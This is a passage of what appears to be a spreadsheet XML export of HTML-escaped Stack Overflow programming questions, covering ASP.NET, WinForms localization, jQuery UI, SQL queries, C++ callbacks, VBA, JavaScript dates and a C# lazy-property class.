&lt;p&gt;&lt;strong&gt;&lt;em&gt;If the controller doesn't have a controller factory, ensure that it has a parameterless public constructor.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;this error is produced whichever way i write the LINQ query and the only way to compile the application is by removing the "Where" clause as follows. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ViewData["OpenTasks"] = DataContext.Tasks.Count();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;any ideas what the problem is or how to resolve this as i need to execute the query against the user and not return all entries.&lt;/p&gt;
&lt;p&gt;thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Localization of a WinForms app and later UI changes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using VS2008 to develop a WinForms 2.0 application. I have read about how to  localize my app in the Visual Studio by setting the Localizable property to true in the designer etc.&lt;/p&gt;
&lt;p&gt;I would like to ask about your experience, how does it work when I translate the app into several languages and then make changes to the user interface. For example, I add some buttons, delete some other controls from a form etc. I know it isn't best practice, but sometimes I have to localize the app in the middle of development and then continue to add new features. Does it all work or will I end with some corrupted resource files or such?&lt;/p&gt;
&lt;p&gt;The reason I am asking is that I had used Borland C++ Builder before, which had big problems when I changed UI in an already localized app.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get jquery ui tabs working?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At &lt;a href="http://docs.jquery.com/UI/Tabs#Example" rel="nofollow"&gt;http://docs.jquery.com/UI/Tabs#Example&lt;/a&gt; there is a short HTML example of how to use JQuery UI Tabs.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I put the HTML in a local index.htm file.&lt;/li&gt;
&lt;li&gt;I downloaded all the CSS and Javascript files, and saved them in local files:&lt;/li&gt;
&lt;li&gt;but the closest I can get is the same example without any color in the tabs.&lt;/li&gt;
&lt;li&gt;I've looked around for images, etc. but can't find any.&lt;/li&gt;
&lt;li&gt;I can even have everything local EXCEPT the CSS file which I get off their server and THEN it works, so it is something in the CSS file that I'm not getting.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What am I not copying locally that the online CSS file has?
Has anyone gotten this JQuery UI Tabs to work and have a zip file that works locally?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"SelectAll" checkbox not working when back button on the browser is clicked</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following html page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
    var check = 0;
function doNow()
{
  void(d=document);
  void(el=d.getElementsByTagName('INPUT'));
  for(i=0;i&amp;lt;el.length;i++)
    {
        if(check == 0)
            void(el[i].checked=1)
        else
            void(el[i].checked=0) 
    }
   if(check == 0)
       check = 1;
   else 
       check = 0;
}
&amp;lt;/script&amp;gt;
&amp;lt;HR&amp;gt;
&amp;lt;form&amp;gt;
&amp;lt;INPUT TYPE="CHECKBOX" name="DG1"&amp;gt;DG1
&amp;lt;INPUT TYPE="CHECKBOX" name="DG2"&amp;gt;DG2
&amp;lt;INPUT TYPE="CHECKBOX" name="DG3"&amp;gt;DG3
&amp;lt;INPUT TYPE="CHECKBOX" name="DG4"&amp;gt;DG4
&amp;lt;INPUT TYPE="CHECKBOX" name="DG5"&amp;gt;DG5
&amp;lt;input type=button onclick="doNow()" value="CheckBox All Now"&amp;gt;
&amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If "CheckBox All Now" is clicked all checkboxes are checked. Then,
if "Back" button or "Refresh" button is pressed. The "CheckBox All now" has to clicked twice to uncheck all checkboxes.&lt;/p&gt;
&lt;p&gt;Please let me know how to handle "CheckBox All Now" in case of "Refresh" or "Back".&lt;/p&gt;
&lt;p&gt;Thanks in Advance,
Mahesh.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it alright to add custom Html attributes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a site I'm working on where I want to mark if a row of data has been changed.
If something has been changed in that row I would mark it with a custom attribute
like so.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;tr&amp;gt;
  &amp;lt;td isDirty="true"&amp;gt;
     ....row data
  &amp;lt;td&amp;gt;
&amp;lt;/tr&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works great with jQuery and it doesn't add to much code to my page.&lt;/p&gt;
&lt;p&gt;But is this really the correct way of doing something like this and what are the downsides?&lt;/p&gt;
&lt;p&gt;I guess another way of doing this would be like this, but it seems like over kill.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;tr&amp;gt;
  &amp;lt;td&amp;gt;
     ....row data
     &amp;lt;input id="isDirty" type="hidden" value="true" /&amp;gt;
  &amp;lt;td&amp;gt;
&amp;lt;/tr&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to configure Tomcat to use Windows NTLM authentication?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use  NTLM authentication with Tomcat so that Iexplorer send automatically both the user id+pwd to webapp.  Is this possible?  &lt;/p&gt;
&lt;p&gt;With "BASIC" authentication IE pops up the usual pwd dialog but I want to skip this dialog.   ( Note, I use JNDIReal/ldap)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has anyone used smartwin (a Windows C++ GUI OS library)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am considering using &lt;a href="http://smartwin.sourceforge.net/" rel="nofollow"&gt;smartwin&lt;/a&gt; for a Windows platform only C++ project but notice that there has not been a release for 18months since 2.0rc5 was released i.e. it appears that it is no longer maintained.&lt;/p&gt;
&lt;p&gt;After playing with it seems pretty good, I like it's use of  templates, signals/slots (via boost) and it will meet the project needs but I would like some experiences of other users who are currently using it to help me weight it up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Shell script user prompt/input</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a crude korn shell script that someone else wrote.  I don't know much about using shell syntax and I'm not even sure if this is possible.&lt;/p&gt;
&lt;p&gt;Is there any way for me to run this file and be prompted for the date so that I don't have to manually go into the script and change it each time?&lt;/p&gt;
&lt;p&gt;For example, I wan to replace the "1/12/09" with a variable that is taken from a user prompt.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/ksh
./clear_old
./rooms_xls.pl 1/12/09
cd doors
./doors_xls.pl 1/12/09
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Does anyone have any useful resources to share or tips to offer for developing a MUD?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a hobby project I am trying to create a ROM (Diku-Merc based) derivative. (Now defunct) I would appreciate it if anybody has done something similar and has some useful resources to share or tips to offer. I'm finding that a lot the resources such as mailing lists are no longer active and many links are dead.&lt;/p&gt;
&lt;p&gt;I've picked ROM because that is what I am familiar as a player, but the source is more complicated than anything I have come across and I wouldn't mind picking a code base that was easier to understand. Any recommendations before I dive in in earnest would also be appreciated. &lt;/p&gt;
&lt;p&gt;As for mudding communities in general I don't know of much beyond the &lt;a href="http://www.mudconnect.com/"&gt;mud connector &lt;/a&gt;because I've always been in more of a user/player role than developer. A forgiving and active place where I can get answers to my questions is what I value most.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to see SOAP data my client application sends?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project where I have created web service proxy classes with wsdl.exe and then simply create an instance of that class (inherits System.Web.Services.Protocols.SoapHttpClientProtocol) and call the method that should send a SOAP message. I'm using Visual Studio 2008 if that matters. And I'm trying this in my development machine without access to actual web service that is located inside of customer's intranet. So, the sending will of course not succeed and I will not get any response back but all I would like to see is the exact content of SOAP messages this solution creates and tries to send. How do I see that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some best practices / conventions / guidelines for ASP.NET or C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Long ago I read a great book on C# and Visual Basic best practices:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Practical Guidelines and Best Practices for Microsoft Visual Basic and Visual C# Developers&lt;/em&gt;
by Francesco Balena, Giuseppe Dimauro&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.dotnet2themax.com/Books/PracticalGuidelines_Cover.gif" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;This book was very helpful to me in its time, which dates back to ASP.NET 1.1.  Please list some current best practices for ASP.NET, C#, and Visual Basic.  And if you've read the book, what are some best practices or guidelines within it that you feel have been outdated?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can a VBA function in Excel return a range?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I seem to be getting a type mismatch error when trying to do something like this:&lt;/p&gt;
&lt;p&gt;In new workbook:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A1 B1
5  4
Function Test1() As Integer
    Dim rg As Range
    Set rg = Test2()
    Test1 = rg.Cells(1, 1).Value
End Function
Function Test2() As Range
    Dim rg As Range
    Set rg = Range("A1:B1")
    Test2 = rg
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Adding =Test1() should return 5 but the code seems to terminate when returning a range from test2(). Is it possible to return a range?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Function pointer to class member function problems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First of all I have to admit that my programming skills are pretty limited and I took over a (really small) existing C++ OOP project where I try to push my own stuff in. Unfortunately I'm experiencing a problem which goes beyond my knowledge and I hope to find some help here. I'm working with a third party library (which cannot be changed) for grabbing images from a camera and will use some placeholder names here. &lt;/p&gt;
&lt;p&gt;The third party library has a function "ThirdPartyGrab" to start a continuous live grab and takes a pointer to a function which will be called every time a new frame arrives. So in a normal C application it goes like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ThirdPartyGrab (HookFunction);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;"HookFunction" needs to be declared as: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long _stdcall HookFunction (long, long, void*);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or "BUF_HOOK_FUNCTION_PTR" which is declared as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef long (_stdcall *HOOK_FUNCTION_PTR) (long, long, void*);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I have a C++ application and a class "MyFrameGrabber" which should encapsulate everything I do. So I put in the hook function as a private member like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long _stdcall HookFunction (long, long, void*);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also there is a public void function "StartGrab" in my class which should start the Grab. Inside I try to call:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ThirdPartyGrab (..., HookFunction, ...);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which (not surprisingly) fails. It says that the function call to MyFrameGrabber::HookFunction misses the argument list and I should try to use &amp;amp;MyFrameGrabber::HookFunction to create a pointer instead. However passing "&amp;amp;MyFrameGrabber::HookFunction" instead results in another error that this cannot be converted to BUF_HOOK_FUNCTION_PTR. &lt;/p&gt;
&lt;p&gt;After reading through the &lt;a href="http://www.parashift.com/c++-faq-lite/pointers-to-members.html" rel="nofollow"&gt;C++ FAQ function pointers&lt;/a&gt; I think I understand the problem but can't make up a solution. I tried to make the hook function static but this also results in a conversion error. I also thought of putting the hook function outside of the class but I need to use class functions inside the hook function. Is there another way or do I need to change my whole concept? &lt;/p&gt;
&lt;p&gt;EDIT 14.01.08:
I tested the singleton workaround since I cannot change the third party library and the void pointer is only for data that is used inside the hook function. Unfortunately it didn't worked out of the box like I hoped.... I don't know if the static function needs to be in a separate class so I put it in my "MyFrameGrabber" class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static MyFrameGrabber&amp;amp; instance()
{
    	static MyFrameGrabber _instance;
    	return _instance;
}
long Hook(long, long, void*); // Implementation is in a separate cpp file
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my cpp file I have the call_hook function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long MFTYPE call_hook(long x, MIL_ID y, void MPTYPE *z)
{
    return MyFrameGrabber::instance().Hook(x,y,z);
}
void
MyFrameGrabber::grab ()
{
    ThirdPartyGrab(..., call_hook, ...);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this gives me an error in &lt;code&gt;static MatroxFrameGrabber _instance;&lt;/code&gt; that no matching standard constructor is found. That's correct because my MyFrameGrabber constructor looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyFrameGrabber (void* x,
                const std::string &amp;amp;y, int z,
                std::string &amp;amp;zz);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried to put in an empty constructor &lt;code&gt;MyFrameGrabber();&lt;/code&gt; but this results in a linker error. Should I pass empty parameters to the MyFrameGrabber constructor in the singleton? Or do I need to have a separate Hook Class and if yes how could I access MyFrameGrabber functions? Thanks in advance. &lt;/p&gt;
&lt;p&gt;SECOND EDIT 15.01.08:
I applied the changes and it compiles and links now. Unfortunately I cannot test this at runtime yet because it's a DLL and I have no Debug Caller Exe yet and there are other problems during initialization etc. I will mark the post as answer because I'm sure this is the right way to do this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>best way to programmatically modify excel spreadsheets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a library that will allow me to programatically modify Excel files to add data to certain cells.  My current idea is to use named ranges to determine where to insert the new data (essentially a range of 1x1), then update the named ranges to point at the data.  The existing application this is going to integrate with is written entirely in C++, so I'm ideally looking for a C++ solution (hence why &lt;a href="http://stackoverflow.com/questions/292551/modifying-excel-spreadsheet-with-net"&gt;this thread&lt;/a&gt; is of limited usefulness).  If all else fails, I'll go with a .NET solution if there is some way of linking it against our C++ app.&lt;/p&gt;
&lt;p&gt;An ideal solution would be open source, but none of the ones I've seen so far (&lt;a href="http://myxls.in2bits.org/"&gt;MyXls&lt;/a&gt; and &lt;a href="http://members.wibs.at/herz/xlsstream/www/index.html"&gt;XLSSTREAM&lt;/a&gt;) seem up to the challenge.  I like the looks of &lt;a href="http://www.aspose.com/categories/file-format-components/aspose.cells-for-.net-and-java/default.aspx"&gt;Aspose.Cells&lt;/a&gt;, but it's for .NET or Java, not C++ (and costs money).  I need to support all Excel formats from 97 through the present, including the XLSX and XLSB formats.  Ideally, it would also support formats such as OpenOffice, and (for output) PDF and HTML.&lt;/p&gt;
&lt;p&gt;Some use-cases I need to support:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;reading and modifying any cell in the spreadsheet, including formulas&lt;/li&gt;
&lt;li&gt;creating, reading, modifying named ranges (the ranges themselves, not just the cells)&lt;/li&gt;
&lt;li&gt;copying formatting from a cell to a bunch of others (including conditional formatting) -- we'll use one cell as a template for all the others we fill in with data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any help you can give me finding an appropriate library would be great.  I'd also like to hear some testimonials about the various suggestions (including the ones in my post) so I can make more informed decisions -- what's easy to use, bug-free, cheap, etc?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you create a JavaScript Date object with a set timezone without using a string representation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web page with three dropdowns for day, month and year. If I use the JavaScript Date constructor that takes numbers then I get a Date object for my current timezone:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new Date(xiYear, xiMonth, xiDate)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Give the correct date but it thinks that date is GMT+01:00 due to daylight savings time.&lt;/p&gt;
&lt;p&gt;The problem here is that I then give this Date to an Ajax method and when the date is deserialised on the server it has been converted to GMT and so lost an hour which moves the day back by one.
Now I could just pass the day, month, and year individually into the Ajax method but it seems that there ought to be a better way.&lt;/p&gt;
&lt;p&gt;The accepted answer pointed me in the right direction, however just using &lt;code&gt;setUTCHours&lt;/code&gt; by itself changed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Apr 5th 00:00 GMT+01:00 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Apr 4th 23:00 GMT+01:00
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then also had to set the UTC date, month and year to end up with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Apr 5th 01:00 GMT+01:00
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is what I wanted&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I mix COUNT() and non-COUNT() columns without losing information in the query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I started with a query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT strip.name as strip, character.name as character
  from strips, characters, appearances
 where strips.id = appearances.strip_id
   and characters.id = appearances.character.id
   and appearances.date in (...)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which yielded me some results:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;strip                 | character
'Calvin &amp;amp; Hobbes'     | 'Calvin'
'Calvin &amp;amp; Hobbes'     | 'Hobbes'
'Pearls Before Swine' | 'Pig'
'Pearls Before Swine' | 'Rat'
'Pearls Before Swine' | 'Hobbes'  # a guest appearance
'Pearls Before Swine' | 'Calvin'  # a guest appearance
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I wanted to also get the &lt;code&gt;COUNT&lt;/code&gt; of the number of times a character is used (in any strip) within the result set.  So I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT count(character.id), strip.name as strip, character.name as character
  from strips, characters, appearances
 where strips.id = appearances.strip_id
   and characters.id = appearances.character.id
   and appearances.date in (...)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that gave me&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ERROR 11:20:17] Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT count(character.id), strip.name as strip, character.name as character
  from strips, characters, appearances
 where strips.id = appearances.strip_id
   and characters.id = appearances.character.id
   and appearances.date in (...)
 group by character.id
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which gave me&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;count | strip                 | character
4     | 'Calvin &amp;amp; Hobbes'     | 'Calvin'
4     | 'Calvin &amp;amp; Hobbes'     | 'Hobbes'
2     | 'Pearls Before Swine' | 'Pig'
2     | 'Pearls Before Swine' | 'Rat'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is, I lose all the extra information about exactly which characters appear in which strips.&lt;/p&gt;
&lt;p&gt;What I'd like to get is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;count | strip                 | character
4     | 'Calvin &amp;amp; Hobbes'     | 'Calvin'
4     | 'Calvin &amp;amp; Hobbes'     | 'Hobbes'
2     | 'Pearls Before Swine' | 'Pig'
2     | 'Pearls Before Swine' | 'Rat'
4     | 'Pearls Before Swine' | 'Calvin'
4     | 'Pearls Before Swine' | 'Hobbes'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I can't seem to figure it out.  I'm on MySQL if it matters.  Perhaps it'll just take two queries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fixing the timezone on Solaris 10</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have no ideas how to fix this.  In my /etc/TIMEZONE file the TZ variable has the correct value (Canada/Eastern) and still it's showing a -1 hour lag.  Where else should I be looking?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Source Safe Version 8</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My issue is that when I check a project out of SS I sometimes do not get the latest version of the project, and when I check a project into SS the .frx files are corrupt.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>T-SQL: Selecting rows to delete via joins</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Scenario:&lt;/p&gt;
&lt;p&gt;Let's say I have two tables, TableA and TableB.  TableB's primary key is a single column (BId), and is a foreign key column in TableA.&lt;/p&gt;
&lt;p&gt;In my situation, I want to remove all rows in TableA that are linked with specific rows in TableB: Can I do that through joins? Delete all rows that are pulled in from the joins?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DELETE FROM TableA 
FROM
   TableA a
   INNER JOIN TableB b
      ON b.BId = a.BId
      AND [my filter condition]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or am I forced to do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DELETE FROM TableA
WHERE
   BId IN (SELECT BId FROM TableB WHERE [my filter condition])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reason I ask is it seems to me that the first option would be much more effecient when dealing with larger tables.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cannot execute program if using boost (C++) libraries in debug-version on WinXP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using boost for several C++ projects.  I recently made a upgrade (1.33.1 to 1.36, soon to 1.37), since then I cannot run any debug-builds anymore.&lt;/p&gt;
&lt;p&gt;To be sure that no other project issues remain, I've created a minimum test-project, which only includes boost.thread, and uses it to start one method.  The release build can be started, the debug build cannot, although the &lt;em&gt;Dependency Walker&lt;/em&gt; shows that all required libraries are found (this also means that the required MS Debug CRT is found in the SxS directory).&lt;/p&gt;
&lt;p&gt;On startup I only get:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Die Anwendung konnte nicht richtig initialisiert werden (0xc0150002).
  Klicken Sie auf "OK", um die Anwendung zu beenden.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Which means nothing more than "failed to initialize app".  An internet research primarily lead to &lt;a href="http://support.microsoft.com/?scid=kb%3Ben-us%3B822520&amp;amp;x=16&amp;amp;y=11" rel="nofollow"&gt;an MS Office installation problem&lt;/a&gt;, which recommends to perform a repair of WinXP.&lt;/p&gt;
&lt;p&gt;So, beside the repair setup (which I think will not help as I'm talking about debug-dll issues), any ideas?&lt;/p&gt;
&lt;p&gt;Ah, before I forget: Absolutely the same source-code leads to no errors on the build-machine (i.e., DLLs can be registered, means executed).  So it's obviously an installation problem, but as the DLLs &lt;em&gt;are&lt;/em&gt; there, and dependency-walker finds it, what else have I forgotten?&lt;/p&gt;
&lt;p&gt;(&lt;strong&gt;edit&lt;/strong&gt;) Well, I have not yet resolved my problem, but thanks to deemok I'm a step further.  For the sake of reducing misunderstandings I give some clarifications below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The program fails to run on the &lt;em&gt;developer&lt;/em&gt;-machine&lt;/li&gt;
&lt;li&gt;I am working with an &lt;em&gt;installed&lt;/em&gt; VS2005 (it's a VC++8 project)&lt;/li&gt;
&lt;li&gt;I used the boost-setup from &lt;a href="http://www.boostpro.com/products/free" rel="nofollow"&gt;BoostPro&lt;/a&gt;, compiled all possible build-versions, and I double-checked that they are there (otherwise I'd already get linker-errors during build).&lt;/li&gt;
&lt;li&gt;and I double-checked any corner of include/lib/bin configuration I can think of -- as boost uses auto-linking on windows, with a special naming convention, the build or start-up would have failed, with a much more comprehensible error-message.&lt;/li&gt;
&lt;li&gt;I &lt;em&gt;cannot&lt;/em&gt; use &lt;em&gt;static linking&lt;/em&gt;, as boost.thread requires dynamic linking for DLL projects (I maybe could mess around here, but as this problem seems to happen only on my machine, I do not want to mess with this, as I'm sure the boost-guys had a reason to place that check in there in the first place)&lt;/li&gt;
&lt;li&gt;As I wrote, I checked with Dependency Walker, and it says everything is just fine.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Currently it seems to be an error in the boost-dll (maybe incorrect Manifest), will check that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are primes important in cryptography?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One thing that always strikes me as a non-cryptographer: Why is it so important to use Prime numbers? What makes them so special in cryptography?&lt;/p&gt;
&lt;p&gt;Does anyone have a &lt;em&gt;simple&lt;/em&gt; short explanation? (I am aware that there are many primers and that Applied Cryptography is the Bible, but as said: I am not looking to implement my own cryptographic algorithm, and the stuff that I found just made my brain explode - no 10 pages of math formulas please :))&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thanks&lt;/strong&gt; for all the answers. I've accepted the one that made the actual concept most clear to me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# - Modifying a Data Table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Data Table that is filled from a database connection. I would like to run checks on the Data Table like replacing the numbers with text and add my own data before binding it to the Data Grid for viewing. How do I access one piece of data in the Data Table? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Make the C preprocessor ignore certain #include directives</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use a parser generator here, that unfortunately insists on putting a&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;some/file.h&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;at the top of every generated source file. The header has since long been renamed. While it is no problem forcing the compiler (gcc) to use the new header with &lt;code&gt;-include new/header.h&lt;/code&gt;, removing the above directive from every generated file complicates the build-process.&lt;/p&gt;
&lt;p&gt;Is there a way to tell gcc to simply ignore &lt;code&gt;some/file.h&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>locale-independent way of getting standard windows registry security object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to get the built-in "Everyone" registry security object in a locale-independent manner?  I want to make a RegistryAccessRule without needing to translate "Everyone" to each language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Server-side Push in Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to implement a scalable chatroom in rails using AJAX.  I know from research that the only scalability happens with a server-side push.&lt;/p&gt;
&lt;p&gt;My two questions are:&lt;/p&gt;
&lt;p&gt;1) In a reasonably efficient chat server, at what point does polling become prohibitive?
2) I really don't want to use Juggernaut.  I don't know much about how comet works.  I guess I'm wondering if this would be horribly difficult for me to build using Javascript (to create a client side server/poller) and another language (to provide efficient polling for clients behind a firewall, and an integration into the CGI).
and 3) (yes, out of 2), whether I'm even going about it the right way?&lt;/p&gt;
&lt;p&gt;The simplest answer I could hope for is a quantified "yes, you put 5 lines of Javascript into the client and 20 lines of ruby into a CGI script, and call it a day".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect version of Java using JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a reliable way of detecting what version of Java is installed on the client's machine using JavaScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a strong password string in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Would like to create a strong password in C++. Any suggestions?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;I assume it should use alpha (upper
and lower), numeric, special
characters.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It would be good to be able to
specify a minimum length.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It would be great to avoid characters
that are hard to visually distinguish
like "O" and "O"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It would be great to void all
characters same, dictionary words,
reversed words, names.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any other tips? Where could I find code like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementing a "LazyProperty" class - is this a good idea?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I often find myself writing a property that is evaluated lazily. Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (backingField == null) 
  backingField = SomeOperation();
return backingField;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is not much code, but it does get repeated a lot if you have a lot of properties.&lt;/p&gt;
&lt;p&gt;I am thinking about defining a class called LazyProperty:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class LazyProperty&amp;lt;T&amp;gt;
    {
    private readonly Func&amp;lt;T&amp;gt; getter;
    public LazyProperty(Func&amp;lt;T&amp;gt; getter)
    {
        this.getter = getter;
    }
    private bool loaded = false;
    private T propertyValue;
    public T Value
    {
        get
        {
            if (!loaded)
            {
                propertyValue = getter();
                loaded = true;
            }
            return propertyValue;
        }
    }
    public static implicit operator T(LazyProperty&amp;lt;T&amp;gt; rhs)
    {
        return rhs.Value;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This would enable me to initialize a field like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;first = new LazyProperty&amp;lt;HeavyObject&amp;gt;(() =&amp;gt; new HeavyObject { MyProperty = Value });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then the body of the property could be reduced to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public HeavyObject First { get { return first; } }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This would be used by most of the company, since it would go into a common class library shared by most of our products.&lt;/p&gt;
&lt;p&gt;I cannot decide whether this is a good idea or not. I think the solutions has some pros, like: &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Less code&lt;/li&gt;
&lt;li&gt;Prettier code&lt;/li&gt;
&lt;/ul&gt;
